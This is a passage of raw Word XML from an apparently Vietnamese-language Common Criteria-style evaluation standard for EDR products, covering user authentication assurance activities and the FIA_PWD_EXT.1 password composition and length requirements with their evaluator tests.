                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra xác định TSS mô tả cách xác thực người dùng được thực hiện. Đánh giá viên phải xác minh rằng các phương pháp ủy quyền được liệt kê trong TSS  được chỉ định và bao gồm trong các yêu cầu trong ST.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="526035A9" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="602F578A" w14:textId="38C09391" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133E26B9" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hoạt động để xác định TSS chứa tài liệu về việc định cấu hình bất kỳ cơ chế xác thực được hỗ trợ nào và bất kỳ hỗ trợ nào cho xác thực đa yếu tố.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="71C842D8" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FF785E9" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65D91C9A" w14:textId="03AB477B" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 1</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Điều kiện: Nếu "cung cấp các cơ chế xác thực </w:t>
            </w:r>
            <w:r w:rsidR="005A544E" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>qua tài khoản và mật khẩu</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>" được chọn, Đánh giá viên phải tạo tài khoản có tên người dùng và mật khẩu, xác minh rằng xác thực đăng nhập có phân biệt chữ hoa chữ thường. Nếu các yếu tố bổ sung được đảm bảo, mỗi một nhân tố sẽ được kiểm tra để truy cập đăng nhập với xác thực đồng nhất nghiêm ngặt cho những người được kích hoạt. Đánh giá viên phải xác minh rằng quyền truy cập đăng nhập được cấp cho thông tin đăng nhập là chính xác và bị từ chối trong trường hợp thông tin đăng nhập không chính xác trên các yếu tố có sẵn.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="552B1B6F" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Điều kiện: Nếu "tận dụng nền tảng" được chọn, Đánh giá viên phải tạo một tài khoản theo các quy tắc nền tảng. Nếu các yếu tố bổ sung được cung cấp, mỗi yếu tố sẽ được kiểm tra quyền truy cập đăng nhập với xác thực nhất trí nghiêm ngặt cho những người được kích hoạt. Đánh giá viên phải xác minh rằng quyền truy cập đăng nhập được cấp cho thông tin đăng nhập chính xác và bị từ chối trong trường hợp thông tin đăng nhập không chính xác trên các yếu tố có sẵn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AB94A49" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc502096854"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3.2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>FIA_PWD_EXT.1 Xác thực mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2163A910" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FIA_PWD_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07599CCA" w14:textId="29C6CD42" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EDR </w:t>
      </w:r>
      <w:r w:rsidR="00C42841" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hỗ trợ</w:t>
      </w:r>
      <w:r w:rsidR="00C42841" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> các yếu tố</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> xác thực mật khẩu sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E099EC" w14:textId="031ADE9D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Mật khẩu </w:t>
      </w:r>
      <w:r w:rsidR="00C42841" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bao gồm bất kỳ tổ hợp nào của [</w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>chữ hoa và chữ thường, [</w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="002D622B">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>: một bộ ký tự ít nhất 52 ký tự</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]], số và ký tự đặc biệt: [</w:t>
      </w:r>
      <w:r w:rsidR="005A544E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>"!"</w:t>
      </w:r>
      <w:r w:rsidR="00C42841" w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">, "@", "#", "$", </w:t>
      </w:r>
      <w:r w:rsidR="00DE3774" w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>"%",</w:t>
      </w:r>
      <w:r w:rsidR="00A752BA" w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> "^", </w:t>
      </w:r>
      <w:r w:rsidR="005A544E" w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>"&amp;",</w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> "*", </w:t>
      </w:r>
      <w:r w:rsidR="005A544E" w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>"(",</w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> ")", [ </w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="002D622B">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>các dữ liệu khác</w:t>
      </w:r>
      <w:r w:rsidR="005A544E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]], độ dài mật khẩu lên đến [</w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="002D622B">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>một số nguyên lớn hơn hoặc bằng 64</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>] ký tự sẽ được hỗ trợ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7DB07A" w14:textId="402A379F" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00715386">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Đơn vị</w:t>
      </w:r>
      <w:r w:rsidR="00715386" w:rsidRPr="00715386">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cung cấp TOE </w:t>
      </w:r>
      <w:r w:rsidR="00715386">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">họn bộ ký tự: chữ hoa và chữ thường Chữ Latinh cơ bản hoặc một bộ ký tự được </w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> khác chứa ít nhất 52 ký tự. Bộ ký tự được </w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> phải được xác định rõ: theo tiêu chuẩn mã hóa quốc tế (chẳng hạn như Unicode) hoặc được xác định trong sự chỉ định của Đánh giá viên. </w:t>
      </w:r>
      <w:r w:rsidR="00715386">
        <w:t xml:space="preserve">Đơn vị </w:t>
      </w:r>
      <w:r w:rsidR="00715386" w:rsidRPr="00204C5F">
        <w:t>cung cấp TOE</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cũng chọn các ký tự đặc biệt được TOE hỗ trợ; có thể tùy chọn liệt kê các ký tự đặc biệt bổ sung được hỗ trợ bằng cách sử dụng thử nghiệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E80593" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hoạt động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703"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="5C9BFC56" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A2A964C" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ED49670" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động đảm bảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="08ED044E" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="672C4B2D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="294CF8AE" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:spacing w:val="-4"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xác minh TSS bao gồm tất  cả các ký tự, quy tắc và giới hạn được hỗ trợ được sử dụng bởi EDR và đáp ứng các yêu cầu của SFR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="537C5AD3" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07CAD6B1" w14:textId="423BAB21" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B9AFA2E" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:spacing w:val="-4"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hoạt động để xác định TSS chứa tài liệu về chính sách mật khẩu mặc định.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="6841EF9F" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64B53F9F" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="185690FA" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên thực hiện các bài kiểm tra sau:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0494F8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải xác minh rằng mật khẩu có tối đa 64 ký tự được hỗ trợ.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66D3D93D" w14:textId="39A48477" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải xác minh rằng các quy tắc thành phần mật khẩu có trong hướng dẫn hoạt động được thực thi. Mặc dù Đánh giá viên không bắt buộc để kiểm tra tất cả các quy tắc thành phần có thể, Đánh giá viên phải đảm bảo rằng tất cả các ký tự được hỗ trợ và các đặc điểm quy luật được liệt kê trong yêu cầu được thực thi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44928745" w14:textId="15E101A2" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
